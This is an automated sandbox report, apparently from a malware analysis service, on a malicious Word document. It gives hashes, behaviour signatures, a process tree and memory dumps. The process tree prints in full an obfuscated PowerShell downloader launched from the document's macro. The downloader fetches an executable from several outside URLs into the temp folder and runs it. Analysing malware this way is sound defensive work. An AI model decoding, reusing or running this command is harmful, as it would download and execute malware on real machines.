Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    12/05/2024, 00:45

General

  • Target

    375fb1c82e6dbe8d6b3ef2b2bffb73a6_JaffaCakes118.doc

  • Size

    315KB

  • MD5

    375fb1c82e6dbe8d6b3ef2b2bffb73a6

  • SHA1

    227d2126f31503ceaa73254dae6a1d50b62f3f3f

  • SHA256

    ac80278a584e6186c3f697bdc0f25402bcd55531328647416cc7ed4f7a1ee4ca

  • SHA512

    9aa24e6dcaebc04bb151ac7c0abbde064b55ef91963684c16337740899da1fc97b1078c27554615e27b73d5b4a66f458be843cdd81a39af791e71d5a606c06a8

  • SSDEEP

    6144:1QlMjnumZM3jYgW5WeuXkgRYWof2JV9IBmokdiztGLP:1QlGHmj9W5CX5R88AtQ

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\375fb1c82e6dbe8d6b3ef2b2bffb73a6_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POWerSheLL.exe
      POWerSheLL "-JOin ('36B80Z122Z106r61{110Z101d119h45!111h98i106s101h99r116s32i78>101i116{46{87d101Z98d67d108!105B101d110s116h59h36!73h78>82B61>39s104s116Z116i112{58r47!47s119h119i119B46B112d101{110s97d115!101i109>97d115B97i46!99s111{109h47Z71B109B119s103d57>72s104r47B64>104s116r116h112h58>47i47r100h117>97B110Z45i118{105i110r99i105r116i121d46r118!110s47r116r47r64i104s116s116d112{58r47h47!119>119d119!46>97{103h110{105!99Z104d97{107i114Z97!46Z99Z111i109s47r112!47>64r104B116h116>112d58r47!47i119i119i119>46{112s97Z114d107d45{111{108B105B109>112!46!114Z48>49Z104B111>115d116h46!114Z117r47>67!78B85B72h57d47s64!104!116r116Z112s58!47i47s106{109{97Z109Z117{115B105{99{97r108d46Z106B112B47s119B111h114d100r112{114>101h115>115i47d119i112h45{99s111!110r116!101s110r116r47!82!48B98h47!39>46i83>112r108>105B116>40{39s64s39B41s59d36i83r79B116Z32B61>32B39i50h56!39Z59{36Z108s73d74r61!36{101{110B118i58r116>101d109s112!43Z39B92>39s43>36s83Z79r116Z43i39Z46i101i120Z101s39{59Z102r111!114>101!97!99Z104i40!36>112d118{98r32{105h110s32Z36Z73r78>82Z41i123r116r114Z121i123{36d80i122h106B46!68r111!119h110i108!111h97h100B70r105B108B101{40!36Z112s118>98h44s32B36{108Z73h74!41d59i83d116!97{114h116!45s80{114{111Z99s101i115d115s32Z36Z108B73r74h59{98h114B101s97r107i59B125h99h97r116s99{104>123Z125!125'-SPLIT 'i' -SPLit '{'-sPLIT'h'-splIt 'r'-spLIt 'd'-SPLit'Z' -SpliT's'-sPlIt '!' -splIT'B' -sPLIt'>' | FOreaCH {([ChAR][INT] $_) } )|. ( ([STrinG]$VErBOseprefERenCE)[1,3]+'x'-JOIN'')"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2732
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1076

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            5321e3b438748e823515f53499ea4245

            SHA1

            a169a9bf85d5b5a7e0b4ff9c7f7b9910a519ad8b

            SHA256

            7d8b3fdcaabdb2f8cedcb9d52d485967d5a18461f2924d9e96f1332e572168d2

            SHA512

            467fdaaac55fcb6b31dd481c339c974be76930bef61e1485203681b3cb050ed4199ed1b9288869235223d78e807562dc8016a8aceda730b07a7a3ace403a4832

          • memory/2016-15-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-76-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-5-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-19-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-7-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-6-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-8-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-88-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-10-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-11-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-12-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-13-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-14-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-0-0x000000002F951000-0x000000002F952000-memory.dmp

            Filesize

            4KB

          • memory/2016-2-0x000000007150D000-0x0000000071518000-memory.dmp

            Filesize

            44KB

          • memory/2016-24-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-17-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-21-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-117-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-16-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-62-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-54-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-20-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-18-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-203-0x000000007150D000-0x0000000071518000-memory.dmp

            Filesize

            44KB

          • memory/2016-204-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-206-0x0000000000610000-0x0000000000710000-memory.dmp

            Filesize

            1024KB

          • memory/2016-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2016-225-0x000000007150D000-0x0000000071518000-memory.dmp

            Filesize

            44KB